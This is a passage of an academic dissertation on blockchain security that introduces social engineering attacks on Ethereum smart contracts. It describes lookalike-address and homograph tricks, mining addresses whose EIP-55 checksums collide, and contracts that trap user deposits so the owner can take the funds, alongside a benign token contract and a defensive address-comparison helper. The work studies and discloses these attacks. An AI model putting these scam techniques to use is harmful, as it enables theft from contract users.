vulnerabilities. When opportunities for exploiting code vulnerabilities diminish, the attackers start
resorting to social engineering attacks, which aim to influence humans — often the weakest link in
the system. The only known class of social engineering attacks in Ethereum are honeypots, which
plant hidden traps for attackers attempting to exploit existing vulnerabilities, thereby targeting only
a small population of potential victims. In this dissertation, we systematically explore the social
engineering attacks in Ethereum smart contracts largely overlooked by existing research on smart
contract security.
    Another important aspect of blockchain security is identity management, which is often en-
trusted to hardware crypto wallets. Hardware wallets are designed to withstand malware attacks
by isolating their private keys from the cyberspace, but they are vulnerable to the attacks that fake
an address stored in a clipboard. To prevent such attacks, a hardware wallet asks the user to verify
the recipient address shown on the wallet’s display. Since crypto addresses are long sequences of
random symbols, their manual verification becomes a difficult task. Consequently, many users of
hardware wallets elect to verify only a few symbols in the address, and this can be exploited by an
attacker. With this insight, we develop a new attack on hardware wallets and report it to the major
manufacturers of the wallets.
1.2.2: Smart Contract Defense
The blockchain technology, initially created for cryptocurrency, has been re-purposed for record-
ing state transitions of smart contracts — decentralized applications that can be invoked through
external transactions. Smart contracts gained popularity and accrued hundreds of billions of dol-
lars in market capitalization in recent years. Unfortunately, like all other programs, smart contracts
are prone to security vulnerabilities that have incurred multimillion-dollar damages over the past
decade. As a result, many automated threat mitigation solutions have been proposed to counter
the security issues of smart contracts. These threat mitigation solutions include various tools and
methods that are challenging to compare. In this dissertation, we develop a comprehensive five-
dimensional classification taxonomy of smart contract threat mitigation solutions and classify 133
existing threat mitigation solutions using our taxonomy.
    Among other discoveries, our classification reveals a low coverage of known vulnerabilities by
existing threat mitigation approaches. To increase the vulnerability coverage, we propose a new
smart contract security testing approach called transaction encapsulation. The core idea lies in the
local execution of transactions on a fully-synchronized yet isolated Ethereum node, which creates
a preview of outcomes of transaction sequences on the current state of blockchain. However, this
approach poses a critical technical challenge — the well-known time-of-check/time-of-use (TOC-
TOU) problem, i.e., the assurance that the final transactions will exhibit the same execution paths as
the encapsulated test transactions. To overcome this challenge, we determine the exact conditions
for guaranteed execution path replicability of the tested transactions. To demonstrate the transac-
tion encapsulation, we implement a transaction testing tool, TxT, which reveals the actual outcomes
(either benign or malicious) of Ethereum transactions. To ensure the correctness of testing, TxT
deterministically verifies whether a given sequence of transactions follows an identical execution
path on the current state of blockchain. We analyze over 1.3 billion Ethereum transactions and de-
termine that 96.5% of them can be verified by TxT. We further show that TxT successfully reveals
the suspicious behaviors associated with 31 out of 37 vulnerabilities (83.8% coverage) in the smart
contract weakness classification (SWC) registry. In comparison, the vulnerability coverage of all
the existing defense approaches combined only reaches 40.5%.
1.2.3: Blockchain Efficiency and Applications
One of the most critical fundamental efficiency challenges of blockchain is scalability of public
blockchains. Public blockchains have spurred the growing popularity of decentralized transactions
and smart contracts, especially in the financial market. However, public blockchains exhibit
limitations in transaction throughput, storage availability, and compute capacity. To avoid
transaction gridlock, public blockchains impose large fees and per-block resource limits, making
it difficult to accommodate the ever-growing high transaction demand. Previous research endeav-
ors to improve the scalability and performance of blockchain through various technologies, such
as side-chaining, sharding, secured off-chain computation, communication network optimizations,
and efficient consensus protocols. However, these approaches have not attained widespread
adoption because they cannot deliver cloud-like scalability in transaction throughput, storage,
and compute capacity. In this dissertation, we address the scalability challenge of decentralized
computation by using the Ethereum blockchain to secure the execution of off-chain smart contracts
on the cloud, thereby eliminating the data, computation, and transaction throughput limitations.
     Another important application of the blockchain technology proposed in this dissertation is
orchestration of decentralized WiFi hotspots. WiFi hotspots often suffer from mediocre security,
unreliable performance, limited access, and cumbersome authentication procedure. Specifically,
public WiFi hotspots can rarely guarantee satisfactory speed and uptime, and their configuration
often requires a complicated setup with subscription to a payment aggregator. Moreover, paid
hotspots can neither protect clients against low quality or non-service after prepayment, nor do
they provide an adequate defense against misuse by the clients. In this dissertation, we introduce a
blockchain-assisted network of WiFi hotspots, which is not only decentralized but also maintains
scalability and high performance.
1.3: Organization
The rest of this document is organized as follows. Part I presents the work in which we reveal
overlooked attacks against blockchain and smart contracts. Chapter 2 introduces six zero-day social
engineering attacks in Ethereum smart contracts. Chapter 3 elaborates on our new attack against
hardware crypto wallets. Part II elaborates on the defense against security threats in smart contracts.
Chapter 4 surveys existing state-of-the-art threat mitigation solutions for smart contracts. Chapter
5 introduces the new paradigm of context-aware user-based transaction testing. Part III presents
novel applications and efficiency enhancements of blockchain. Chapter 6 addresses the blockchain
scalability problem by enabling smart contracts on the cloud. Chapter 7 introduces a blockchain-
based solution for decentralized network of WiFi hotspots with cross-domain authentication and
QoS enforcement. Chapter 9 summarizes this dissertation and outlines future directions.
CHAPTER 2: SOCIAL ENGINEERING IN
ETHEREUM SMART CONTRACTS¹
2.1: Introduction
In one decade, blockchain technology has grown from the ledger of a barely known cryptocurrency
into an entire industry with hundreds of billions of dollars in market capitalization. A major
reason for this expansion is the ability to support smart contracts: decentralized programs that
can enforce execution of protocols without any third party or mutual trust. Moreover, smart
contracts are used to store and transfer financial assets. For example, as of December 2020, the Tether
USD smart contract had more than 2.1 million users with about $36 billion in daily transaction
volume [28].
      Like any other software, smart contracts have security vulnerabilities, manifested by recent
hacks with multimillion-dollar damages [207, 226]. Moreover, a recent analysis of 420 million
Ethereum transactions by Zhou et al. reveals an ongoing evolution of vulnerabilities and attacks
in smart contracts [309]. To avoid devastating consequences of smart contract hacks, a number of
security auditing tools have been developed to detect smart contract vulnerabilities [76,96,200,271],
such as reentrancy, integer overflow, etc., most of which are smart contract code vulnerabilities.
However, smart contracts are designed and implemented by human developers to interact with
human users, which makes the human the central component of a smart contract ecosystem. Yet, the
existing smart contract security studies do not take the human factor into account. In this work, we
aim to deliver the first human-centered study of smart contract security.
    ¹ This chapter is based on previously published work by Nikolay Ivanov, Jianzhi Lou, Ting Chen, Jin Li and
Qiben Yan titled “Targeting the Weakest Link: Social Engineering Attacks in Ethereum Smart Contracts” published
in the Proceedings of the 2021 ACM Asia Conference on Computer and Communications Security. DOI:
10.1145/3433210 [158].
      Instead of targeting known code vulnerabilities, social engineering attacks exploit the cognitive
bias of the human mind. Cognitive bias is an optimization function of the human brain that draws
conclusions based on probability, expectation, previous experience, belief, or emotional response,
especially when the input data is incomplete and/or decision time is limited [145]. One common
technique exploiting cognitive bias is visual deception, which has been widely used in email phish-
ing, e.g., via mimicking the appearance of a popular website [285] or International Domain Name
(IDN) homograph attacks [150]. Another aspect of cognitive bias is confirmation bias, character-
ized by the rejection of evidence dissenting from the initially established belief or narrative [169].
The smart contract honeypot is one example of confirmation bias exploitation, in which the established
narrative that the smart contract is vulnerable makes even experienced hackers overlook hidden
traps.
    The honeypot is the only known and documented social engineering attack type in Ethereum [270].
A honeypot is a smart contract that lures a hacker into exploiting a known vulnerability, but an
insidious trap in this contract turns the hacker into a victim instead. Despite being a very effective
attack class, the scope of potential victims of honeypots is narrow, i.e., skillful hackers who try to
steal unprotected funds.
    In this work, we demonstrate that the Ethereum platform and the most popular smart contract
programming language, Solidity, create a potential for evasive social engineering attacks. Social
engineering attacks have been carried out across a wide spectrum of technologies, from landline
phones to corporate networks. When existing software and hardware defenses reduce the attack
surface, the adversaries resort to exploiting human cognitive bias, the weakest link in many
security systems. To the best of our knowledge, this work presents the first investigation of the
possibility, vectors, and impact of social engineering attacks in smart contracts, as well as defense
against these attacks. Specifically, we attempt to answer the following three research questions.
RQ1: What are the Ethereum social engineering attack vectors? We analyze the exact aspects
of human cognitive bias that can be exploited to carry out social engineering attacks in smart con-
tracts. Specifically, we discover several common misconceptions and undocumented behaviors of
the Ethereum platform that create opportunities for a set of zero-day social engineering attacks.
RQ2: Are social engineering attacks in smart contracts feasible? Through our analysis, we
identify two classes of social engineering deception — Address Manipulation and Homograph.
Across these two categories, we develop six social engineering attacks. By integrating the patterns
of these attacks into the source code of existing contracts with large numbers of users and billions of
dollars in market capitalization, we further show that these attacks could potentially target a large
number of victims.
RQ3: What are the defenses against social engineering attacks in Ethereum? The human is
not only the main target of social engineering attacks, but also an irreplaceable element of defense
against these attacks. This prompts us to develop specific security recommendations for identifica-
tion and prevention of social engineering attacks by users and auditors.
     In summary, this dissertation delivers the following contributions:
     • We identify two classes of social engineering attacks in Ethereum smart contracts, Address
        Manipulation and Homograph, and develop six zero-day attacks.
     • We demonstrate the attacks by embedding them in the source code of five popular smart contracts
        with a combined market capitalization of over $29 billion, and show that the attacks have
        the ability to remain dormant during the testing phase and activate only after production de-
        ployment.
     • We analyze 85,656 open source smart contracts and find 1,027 contracts that can be directly
        used for performing social engineering attacks.
     • For responsible disclosure, we contact seven smart contract security firms. The survey of
        experts from these firms confirms that the proposed attacks are highly likely to be dangerous.
     • In the spirit of open research, we make the source code of the attack benchmark, tools, and
        datasets available to the public².
   ² https://nick-ivanov.github.io/se-info/
2.2: Background
Smart Contracts and EVM: A smart contract is a program deployed on a blockchain that provides
a set of functions to be called via transactions and executed by the blockchain’s virtual machine
(VM). Most smart contracts are written in a high-level special-purpose programming language,
such as Solidity or Vyper, and compiled into the blockchain VM bytecode. The Ethereum Virtual
Machine (EVM) is the blockchain VM for executing Ethereum smart contracts.
Externally Owned Account: Ethereum blockchain has two types of accounts: smart contract
account and externally owned account (EOA). Both EOAs and smart contract accounts can be
referenced by their 160-bit public addresses. EOAs can be used to call the functions of smart
contracts via signed transactions.
ERC-20 Tokens: ERC-20 is the most popular standard for implementing fungible tokens³ in
Ethereum smart contracts. Some of the most traded alternative cryptocurrencies (altcoins) are
ERC-20-compatible smart contracts deployed on Ethereum Mainnet, such as ChainLink and Binance
Coin. The ERC-20 standard defines an interface that a smart contract should implement in
order to become an ERC-20 token to interact with ERC-20-compliant clients⁴.
OpenZeppelin Contracts: OpenZeppelin Contracts is a library of smart contracts that have been
extensively tested for adherence to the best security practices. These smart contracts are considered
to be the de-facto standardized implementations of popular smart contract code patterns. The
OpenZeppelin project provides a rich codebase for ERC-20 token developers⁵.
EIP-55 Checksums: Developers of blockchain clients use checksums for validating public addresses.
A checksum is a digital fingerprint of an address to ensure its validity and correctness.
In Ethereum, the checksum is embedded in the address by capitalizing certain hexadecimal letters,
as described in the EIP-55 standard⁶. Specifically, if the i-th hexadecimal digit of the Keccak256 hash
digest of the lowercase hexadecimal address string is ≥ 8, the i-th hexadecimal digit of the address
is capitalized. The accuracy of EIP-55 error checking is nearly 99.986% [55].
   ³ Each fungible token has the same value and does not possess any special characteristics compared with other
tokens of the same type.
   ⁴ https://eips.ethereum.org/EIPS/eip-20
   ⁵ https://openzeppelin.com/contracts/
   ⁶ https://eips.ethereum.org/EIPS/eip-55
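The EIP-55 capitalization rule described above can be sketched in Python as follows. This is a minimal illustration under stated assumptions, not a production implementation. Because the Python standard library does not ship Ethereum's Keccak-256 (`hashlib.sha3_256` uses different padding), the sketch carries its own compact pure-Python version. The helper names `keccak256`, `to_eip55`, and `is_valid_eip55` are hypothetical, and the sample address is a test vector from the EIP-55 specification.

```python
def _rol64(value, shift):
    """Rotate a 64-bit word left by `shift` bits."""
    shift %= 64
    return ((value << shift) | (value >> (64 - shift))) & 0xFFFFFFFFFFFFFFFF


def _keccak_f1600(lanes):
    """Apply the 24-round Keccak-f[1600] permutation to a 5x5 matrix of lanes."""
    lfsr = 1
    for _ in range(24):
        # Theta: mix each column parity into the neighbouring columns.
        c = [lanes[x][0] ^ lanes[x][1] ^ lanes[x][2] ^ lanes[x][3] ^ lanes[x][4]
             for x in range(5)]
        d = [c[(x + 4) % 5] ^ _rol64(c[(x + 1) % 5], 1) for x in range(5)]
        lanes = [[lanes[x][y] ^ d[x] for y in range(5)] for x in range(5)]
        # Rho and pi: rotate each lane and move it to a new position.
        x, y = 1, 0
        current = lanes[x][y]
        for t in range(24):
            x, y = y, (2 * x + 3 * y) % 5
            current, lanes[x][y] = lanes[x][y], _rol64(current, (t + 1) * (t + 2) // 2)
        # Chi: non-linear step applied along each row.
        for y in range(5):
            row = [lanes[x][y] for x in range(5)]
            for x in range(5):
                lanes[x][y] = row[x] ^ (~row[(x + 1) % 5] & row[(x + 2) % 5])
        # Iota: inject the round constant generated by an 8-bit LFSR.
        for j in range(7):
            lfsr = ((lfsr << 1) ^ ((lfsr >> 7) * 0x71)) % 256
            if lfsr & 2:
                lanes[0][0] ^= 1 << ((1 << j) - 1)
    return lanes


def keccak256(data):
    """Keccak-256 as used by Ethereum (original padding, not NIST SHA3-256)."""
    rate = 136  # bytes absorbed per permutation (1088-bit rate)
    padded = bytearray(data)
    padded += b"\x01" + b"\x00" * (rate - len(data) % rate - 1)
    padded[-1] |= 0x80  # pad10*1: closing bit in the last byte of the block
    lanes = [[0] * 5 for _ in range(5)]
    for offset in range(0, len(padded), rate):
        for i in range(rate // 8):
            word = int.from_bytes(padded[offset + 8 * i:offset + 8 * i + 8], "little")
            lanes[i % 5][i // 5] ^= word
        lanes = _keccak_f1600(lanes)
    return b"".join(lanes[x][0].to_bytes(8, "little") for x in range(4))


def to_eip55(address):
    """Return the EIP-55 mixed-case form of a 40-digit hexadecimal address."""
    digits = (address[2:] if address[:2].lower() == "0x" else address).lower()
    if len(digits) != 40 or any(ch not in "0123456789abcdef" for ch in digits):
        raise ValueError("expected 40 hexadecimal digits")
    digest = keccak256(digits.encode("ascii")).hex()
    # Capitalize the i-th digit when the i-th hex digit of the digest is >= 8.
    mixed = [ch.upper() if int(digest[i], 16) >= 8 else ch
             for i, ch in enumerate(digits)]
    return "0x" + "".join(mixed)


def is_valid_eip55(address):
    """Check that a 0x-prefixed address carries the expected capitalization."""
    return address == to_eip55(address)


sample = "0x5aAeb6053F3E94C9b9A09f33669435E7Ef1BeAed"  # EIP-55 test vector
print(to_eip55(sample.lower()))
print(is_valid_eip55(sample), is_valid_eip55(sample.lower()))
```

Only the letters a to f can carry checksum information, since decimal digits have no uppercase form.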
Smart Contract Addresses: A smart contract address in Ethereum is generated using the deterministic
function⁷ $\chi(A_d, \eta)$, where $A_d$ is the public address of the account deploying the contract,
and $\eta$ is the nonce of the deploying transaction. $\eta$ is always equal to the number of transactions
sent from the deploying EOA. As a result, we can deterministically calculate the address of a future
smart contract that will be deployed by a certain user.
EVM Function Selector: In EVM, when a smart contract function is called by an EOA or another
smart contract, the called function is identified by its selector $S_f$ as follows:
$$S_f = P_{32}\Bigl(H_k\bigl(\overbrace{\text{``}f(\alpha_1, \ldots, \alpha_n)\text{''}}^{\text{function header string}}\bigr)\Bigr),$$
where $P_{32}$ is a 32-bit prefix, $H_k$ is the Keccak256 hash function, $f$ is the function name, and
$\alpha_1, \ldots, \alpha_n$ is the list of argument types ($0 \le n \le 16$). For example, the selector of the function foo
with a single 256-bit unsigned integer argument is $P_{32}(H_k(\text{``foo(uint256)''})) = \texttt{0x2fbebd38}$.
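The selector definition above can be reproduced with a short Python sketch: hash the function header string with Keccak-256 and keep the first four bytes. The helper names `keccak256` and `selector` are hypothetical, and the Keccak-256 routine is a compact pure-Python version included only because the standard library does not provide Ethereum's variant (`hashlib.sha3_256` uses different padding).

```python
def _rol64(value, shift):
    """Rotate a 64-bit word left by `shift` bits."""
    shift %= 64
    return ((value << shift) | (value >> (64 - shift))) & 0xFFFFFFFFFFFFFFFF


def _keccak_f1600(lanes):
    """Apply the 24-round Keccak-f[1600] permutation to a 5x5 matrix of lanes."""
    lfsr = 1
    for _ in range(24):
        # Theta
        c = [lanes[x][0] ^ lanes[x][1] ^ lanes[x][2] ^ lanes[x][3] ^ lanes[x][4]
             for x in range(5)]
        d = [c[(x + 4) % 5] ^ _rol64(c[(x + 1) % 5], 1) for x in range(5)]
        lanes = [[lanes[x][y] ^ d[x] for y in range(5)] for x in range(5)]
        # Rho and pi
        x, y = 1, 0
        current = lanes[x][y]
        for t in range(24):
            x, y = y, (2 * x + 3 * y) % 5
            current, lanes[x][y] = lanes[x][y], _rol64(current, (t + 1) * (t + 2) // 2)
        # Chi
        for y in range(5):
            row = [lanes[x][y] for x in range(5)]
            for x in range(5):
                lanes[x][y] = row[x] ^ (~row[(x + 1) % 5] & row[(x + 2) % 5])
        # Iota
        for j in range(7):
            lfsr = ((lfsr << 1) ^ ((lfsr >> 7) * 0x71)) % 256
            if lfsr & 2:
                lanes[0][0] ^= 1 << ((1 << j) - 1)
    return lanes


def keccak256(data):
    """Keccak-256 as used by Ethereum (original padding, not NIST SHA3-256)."""
    rate = 136  # bytes absorbed per permutation (1088-bit rate)
    padded = bytearray(data)
    padded += b"\x01" + b"\x00" * (rate - len(data) % rate - 1)
    padded[-1] |= 0x80
    lanes = [[0] * 5 for _ in range(5)]
    for offset in range(0, len(padded), rate):
        for i in range(rate // 8):
            word = int.from_bytes(padded[offset + 8 * i:offset + 8 * i + 8], "little")
            lanes[i % 5][i // 5] ^= word
        lanes = _keccak_f1600(lanes)
    return b"".join(lanes[x][0].to_bytes(8, "little") for x in range(4))


def selector(header):
    """Return the 32-bit selector: the first 4 bytes of Keccak-256 of the header."""
    return "0x" + keccak256(header.encode("utf-8"))[:4].hex()


# The header contains the function name and argument types, without spaces.
for header in ("foo(uint256)", "transfer(address,uint256)"):
    print(header, selector(header))
```

The header is hashed as raw bytes, so any change to the bytes of the string, even one that is invisible on screen, produces a different input to the hash.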
2.3: Threat Model
In this section, we give a general overview of social engineering attacks in Ethereum smart contracts
by identifying their participants, vectors, goals, and outcomes.
2.3.1: Actors
Most known attacks in Ethereum smart contracts involve a hacker exploiting a smart contract vul-
nerability [55, 309]. In social engineering attacks, however, a reverse configuration takes place:
the owner of the malicious smart contract is the attacker, and the victim of the smart contract is a
person or organization who engages with this smart contract.
    ⁷ An implementation of this function can be found at https://github.com/ethereumjs/ethereumjs-util.
2.3.2: Social Engineering Attack Vectors
Here, we expose a number of social engineering attack vectors that are likely to be exploited. Es-
sentially, all these vectors are misconceptions (false assumptions) about properties or behaviors
of the Ethereum platform. We subdivide these misconceptions into two major categories: 1) mis-
conceptions about Ethereum addresses, and 2) misconceptions related to strings and characters in
EVM and Solidity.
Misconceptions About Addresses: An Ethereum public address is a 160-bit number using a 40-
digit hexadecimal representation. Our analysis reveals that the following four false assumptions
about Ethereum public addresses can be exploited in social engineering attacks.
     • M1: Slight modification of an address (e.g., substitution of a single digit) is useless for an
       attacker because no one knows the private key associated with the modified address. In
       this dissertation, we demonstrate that the knowledge of the private key for an address is not
       always required for a successful social engineering attack.
     • M2: EIP-55 checksums deliver a reliable protection against address falsification. In this
       work, we show that EIP-55 falsification is possible using a brute-force attack on a retail
       laptop or desktop computer.
     • M3: An Ethereum address is associated either with an EOA, or a smart contract, and does
       not change its status. In this dissertation, we demonstrate that an EOA can mutate into a
       smart contract and vice versa.
     • M4: All Ethereum accounts are equally secure as long as their private keys are random and
       secret. In this dissertation, we show that a small portion of Ethereum accounts have a special
       property, making them more vulnerable to a specific social engineering attack.
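Because an address is a 160-bit number, its 40-digit hexadecimal spelling is only a representation. The following minimal Python sketch, with the hypothetical helper `address_value`, shows that letter case does not change the underlying value, while the substitution of a single digit does. It illustrates the representation only and does not reproduce any of the attacks; the sample address is a test vector from the EIP-55 specification.

```python
def address_value(address):
    """Parse a 40-digit hexadecimal address into its 160-bit integer value."""
    digits = address[2:] if address[:2].lower() == "0x" else address
    if len(digits) != 40:
        raise ValueError("expected 40 hexadecimal digits")
    return int(digits, 16)


checksummed = "0x5aAeb6053F3E94C9b9A09f33669435E7Ef1BeAed"  # EIP-55 test vector
lowercase = checksummed.lower()
tampered = lowercase[:-1] + "c"  # last digit substituted (d replaced by c)

# Same number regardless of capitalization.
print(address_value(checksummed) == address_value(lowercase))
# A different number, hence a different account.
print(address_value(tampered) == address_value(lowercase))
```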
Homograph Backdoors in Solidity: Falsification of typographic symbols, known as a homograph
or Unicode attack, has been used in phishing scams [124,150,192]. These attacks mostly falsify
domain names, and to the best of our knowledge, there are no recorded homograph attacks carried
out inside the source code of a program. Surprisingly, our analysis of Solidity reveals the following three
misconceptions that open dangerous backdoors to homograph attacks in Ethereum smart contracts.
      • M5: Since the string returned by the ERC-20 symbol() function is optional and informa-
        tional by design, it does not pose any danger. In this dissertation, we show that by falsifying
        the symbol of an ERC-20 token, an attacker can perform a social engineering attack.
      • M6: Two identical arguments of call() or delegatecall() always result in the same 32-bit
        function selector. In this dissertation, we demonstrate that two identical arguments are capa-
        ble of producing different function selectors, which leads to the execution of an unexpected
        function or transaction reversion due to the absence of a referenced function.
      • M7: Function selector collision prevention by Solidity compiler eliminates falsification of
        smart contract functions. In smart contracts, two functions with colliding selectors cannot
        coexist in one contract. In this dissertation, we show that it is possible to mine names of
        two functions with visually identical arguments of call() or delegatecall() routines that
        generate different selectors, thereby allowing these two functions to coexist in the contract.
        Consequently, unbeknownst to the transaction sender, a non-existent function might be called,
        resulting in transaction reversal; or a wrong function might be called, leading to unexpected
        code execution.
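The notion of visually identical strings used in the list above can be made concrete with a small Python sketch. It assumes a Cyrillic small letter a (U+0430) substituted for the Latin a in a function header; the header and the helper `describe` are hypothetical examples rather than the strings used in the attacks of this chapter.

```python
import unicodedata


def describe(text):
    """List (character, code point, Unicode name) for each non-ASCII character."""
    return [(ch, f"U+{ord(ch):04X}", unicodedata.name(ch, "UNKNOWN"))
            for ch in text if ord(ch) > 127]


latin = "transfer(address,uint256)"
spoofed = "tr\u0430nsfer(address,uint256)"  # U+0430 replaces the Latin 'a'

# Many fonts render both strings identically, yet they are different strings.
print(latin == spoofed)
# Their UTF-8 encodings also differ, so any hash computed over them has different inputs.
print(latin.encode("utf-8") == spoofed.encode("utf-8"))
# A simple audit aid: report every character outside the ASCII range.
print(describe(spoofed))
```

A check of this kind, which flags non-ASCII characters in string literals and function headers, is one simple way for an auditor to surface a homograph substitution that the eye would miss.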
2.3.3: Attack Goals and Outcomes
Although some Ethereum attackers may pursue vandalism as the primary goal (e.g., via “funds
freeze”), in this work, we assume that the ultimate objective of the attacker is to steal funds from
victims. All social engineering attacks covered in this study are based on the premise that the
attacker is the owner or privileged user of the smart contract⁸, which creates a broad range of
possibilities for stealing funds. For example, many contracts implement the selfdestruct procedure,
which allows the owner to appropriate the entire balance of the contract by submitting a single
transaction.
   ⁸ In Ethereum, the implementation of smart contract ownership is the developer’s responsibility. Zhou et al. [309]
report more than 2 million contracts with ownership implemented using the OpenZeppelin Ownable abstract class and
onlyOwner modifier.
     Moreover, as of early December 2020, Etherscan reports more than 342,000 ERC-20 smart
contracts, which have a variety of operations with tokenized funds, such as minting, burning,
approved transfer, etc. For example, in the Tether USD stablecoin token, which is worth over $19 billion,
the owner can call the deprecate function of the contract, effectively replacing the functionality
of the smart contract with arbitrary code. Subsequently, it would take only a few minutes for
the contract owner to steal all the tokens and exchange them for Ether, at which point no existing
defense can revert the theft of funds. Essentially, when the attacker is the owner of the smart
contract, it is unnecessary to implement the malicious transfer of funds within the call stack of the
transaction submitted by the victim. Instead, the attacker may prefer to accrue a sufficient sum by
blocking fund withdrawals, and acquire the entire balance afterwards. Such an approach makes the
malicious patterns more stealthy than an immediate transfer of stolen funds.
                  Table 2.1: Social engineering attacks in Ethereum smart contracts.
Attack Class    Social Engineering Attack and Brief Description               Misconceptions
Address         A1: Replace EOA with a non-payable contract address           M1, M2
Manipulation        to incur transfer failure and revert transaction
                A2: Pre-calculate a future contract address and replace       M3
                    EOA with a non-payable contract at this address
                A3: Exploit EVM’s EIP-55 checksum insensitivity               M4
                    in address comparison
Homograph       A4: Use dynamically-injected homograph                        M5
                    string in a branching condition
                A5: Replace inter-contract call (ICC) header with             M6, M7
                    identically looking one to call a non-existing function
                A6: Suppress EVM exception by mining a                        M6, M7
                    function that matches a tampered ICC header
2.4: Social Engineering Attacks
In this section, we introduce six Ethereum social engineering attacks grouped into two classes,
as shown in Table 2.1. The Address Manipulation class allows attackers to strategically exploit
Ethereum public addresses, which enables attacks A1, A2, and A3. The Homograph class, which
takes advantage of the fact that many fonts have identical-looking symbols with different codes,
includes attacks A4, A5, and A6. The implementations of all six attacks are available at
https://nick-ivanov.github.io/se-info/.

contract BaseToken is Context, ERC20, ERC20Detailed {
   uint256 tokenPrice = 100 wei;
   // Mint the initial supply against the Ether sent at deployment.
   constructor() public payable ERC20Detailed("BaseToken", "BT", 18) {
      _mint(_msgSender(), SafeMath.div(msg.value, tokenPrice));
   }
   // Deposit Ether and mint the corresponding number of tokens.
   function buyTokens() public payable {
      _mint(_msgSender(), SafeMath.div(msg.value, tokenPrice));
   }
   // Burn the caller's tokens and send back the corresponding amount of Ether.
   function sellTokens(uint256 amount) public {
      _burn(_msgSender(), amount);
      address(msg.sender).transfer(SafeMath.mul(amount, tokenPrice));
   }
}
Figure 2.1: Implementation of the Base Token, which is used to demonstrate the six social
engineering attacks.
Base Token: We demonstrate all six attacks by altering the implementation of the smart contract
called Base Token (see Fig. 2.1). This contract is an Ether-collateralized ERC-20 token, which
means that the supply of tokens in the contract is backed by its Ether balance, allowing users to
swap (i.e., buy and sell) the tokens using Ether. We implement Base Token using the OpenZeppelin
ERC-20 prototype with two additional methods:
     • the buyTokens method deposits Ether in the smart contract and mints (issues) tokens
       corresponding to the deposited amount;
     • the sellTokens method burns (destroys) user tokens and transfers the corresponding amount of
       Ether to the caller.
2.4.1: Address Manipulation
Address Manipulation attacks exploit cognitive biases and misconceptions about equality, format,
referenced objects, derivation methods, and other properties of Ethereum public addresses. In this
section, we propose three social engineering attacks: A1 , A2 , and A3 .
Attack A1: This attack covertly replaces an EOA address with a visually similar smart contract
address, which allows the attacker to block fund withdrawals and subsequently acquire the funds. In
attack A1, the attacker deploys a smart contract with two sequential Ether transfers within the call
stack of one transaction. The first transfer looks like a fee collection, while the second transfer
is a fund transfer to the user. The attacker deceives the victim into believing that the first
transfer goes to an EOA, whereas the real destination is a smart contract without a payable fallback
function. Therefore, the transfer fails and the transaction reverts, so the funds (deposited by the
users earlier) remain in the malicious contract, where they are available to the attacker for
subsequent withdrawal through contract self-destruction, deprecation, or a similar mechanism.
                                  Figure 2.2: Attack A1 workflow.
    Essentially, the attacker exploits the fact that almost any unused sequence of 40 hexadecimal
digits is a valid EOA address, even if its corresponding private key is unknown. In particular, if
a few symbols in an address are replaced or swapped, the resulting address will still be a valid
Ethereum EOA, which can accept incoming Ether transfers. In attack A1, as shown in Fig. 2.2,
the adversary deploys a malicious smart contract CA. The variable feeAddress in this contract
is initialized with an EOA address A1. Also, each fund transfer to the user is preceded by another
transfer of a small fee to the address stored in feeAddress. This creates the illusion that the
smart contract was deployed to profit from service fees. However, the real purpose of the contract
is to lure the user into making a deposit and then block any attempt to withdraw the funds.
      To achieve that, we introduce another public address A2, derived from address A1 by either
changing one symbol or swapping neighboring symbols to make the two addresses visually similar.
The manipulated address must maintain a valid checksum that collides with the checksum of the
original address, reassuring the user that the address is the one seen in the constructor. We find
that mining such an address pair takes only a few seconds⁹, which demonstrates the incorrectness
of M2. Address A2 belongs to a pre-existing smart contract Caux, which does not have a payable
fallback function. The attacker sets the value of feeAddress to A2. Due to the visual similarity
of the addresses, the user deposits funds under the assumption that the fees go to A1. However, the
withdrawal fails due to an attempt to send fees to a non-payable smart contract. For further
deception, the attacker can generate a history of successful fee transfers from the smart contract
to address A1, deceiving the users into believing that fee payments are being processed
successfully. This deepens the users’ confirmation bias in favor of the attacker’s deceptive
narrative.
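The two manipulations named above (changing one symbol, or swapping two neighboring symbols) are simple enough to check mechanically when an auditor compares a stored address against the one seen in the constructor. The following Python sketch is an illustrative auditing aid, not part of the address miner referenced in this section: the function name lookalike_kind and the sample addresses are hypothetical, and the comparison deliberately ignores letter case, so it does not validate EIP-55 checksums.

```python
def _digits(address: str) -> str:
    """Lowercase the address and drop an optional 0x prefix."""
    text = address.lower()
    if text.startswith("0x"):
        text = text[2:]
    if len(text) != 40:
        raise ValueError("expected 40 hexadecimal digits")
    return text


def lookalike_kind(addr_a: str, addr_b: str) -> str:
    """Classify how two addresses differ (hypothetical helper).

    Returns "identical", "substitution" (exactly one symbol differs),
    "swap" (two neighboring symbols exchanged), or "different".
    """
    a, b = _digits(addr_a), _digits(addr_b)
    diff = [i for i in range(40) if a[i] != b[i]]
    if not diff:
        return "identical"
    if len(diff) == 1:
        return "substitution"
    if (len(diff) == 2 and diff[1] == diff[0] + 1
            and a[diff[0]] == b[diff[1]] and a[diff[1]] == b[diff[0]]):
        return "swap"
    return "different"


# Made-up 40-digit addresses, used only for illustration.
original = "0x" + "1a2b3c4d5e" * 4
substituted = original[:10] + "f" + original[11:]                    # one symbol changed
swapped = original[:6] + original[7] + original[6] + original[8:]    # neighbors swapped

print(lookalike_kind(original, substituted))   # substitution
print(lookalike_kind(original, swapped))       # swap
```

A result of "substitution" or "swap" for two addresses that are supposed to be the same is exactly the situation the fourth layer of deception relies on the victim overlooking.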
      The attack workflow in Fig. 2.2 includes four layers of deception that give the victim several
clues aligned with the same narrative (i.e., the contract is a fair for-profit scheme), thereby
exploiting the victim’s confirmation bias. The first layer of deception is that the smart contract
does not reveal its deceptive nature during a test deployment: if a user compiles and deploys this
smart contract for testing, the scheme will support the deceptive narrative because the test
deployment cannot predict that the owner would change the value of feeAddress to the address of a
non-payable smart contract. The second layer of deception comes from the deployment-time
initialization of the feeAddress variable: by examining this address, the victim finds a history of
fair transactions. The third layer of deception is delivered by keeping the feeAddress variable
private, which prevents the victim from easily retrieving its current value, as doing so requires
the laborious effort of parsing binary transaction data. The fourth layer of deception targets a
user who manages to retrieve the current value of feeAddress. Since this value is visually similar
to the initialization address, the victim is likely to conclude that the original address is in use.
    ⁹ Our address miner is available at https://github.com/nick-ivanov/se-tools
Attack A2: This attack intercepts a client deposit event and immediately deploys an auxiliary
malicious smart contract at an EOA address in order to steal funds accrued via blocked withdrawals.
The key idea is to mislead the user by replacing, at runtime, the object that an address points to,
which is a more sophisticated method than the one used in the previous attack. Here, we discover a
peculiar combination of two facts about Ethereum that lead to the incorrectness of M3: a) the
address of a future, not yet deployed, smart contract is predictable; b) prior to deployment, the
